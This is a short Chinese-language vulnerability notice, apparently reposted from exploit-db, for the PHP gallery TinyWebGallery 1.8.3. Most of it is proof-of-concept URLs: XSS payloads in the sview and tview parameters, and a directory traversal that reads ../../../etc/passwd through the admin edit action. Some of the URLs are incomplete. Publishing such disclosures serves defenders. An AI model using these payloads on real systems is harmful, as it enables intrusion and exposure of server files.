TinyWebGallery是一款php相册程序,TinyWebGallery 1.8.3中包含多个安全漏洞,包括目录遍历和XSS,可能导致敏感信息泄露,
TinyWebGallery 1.8.3版多个安全漏洞漏洞预警
。[+]info:
~~~~~~~~~
Script. TinyWebGallery
Version: 1.8.3 (No fixes yet, might work on other versions too).
Home: http://www.tinywebgallery.com
[+]poc:
~~~~~~~~~
http://localhost/twg183/admin/index.php?sview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?tview="onmouseover=alert(String.fromCharCode(88,83,83));"
http://localhost/twg183/admin/index.php?dir=
http://localhost/twg183/admin/index.php?action=chmod&item=
http://localhost/twg183/twg183/admin/index.php?action=chmod&item=">
http://localhost/twg183/admin/index.php?action=edit&item=../../../etc/passwd
[+]Reference:
~~~~~~~~~
http://www.exploit-db.com/exploits/16090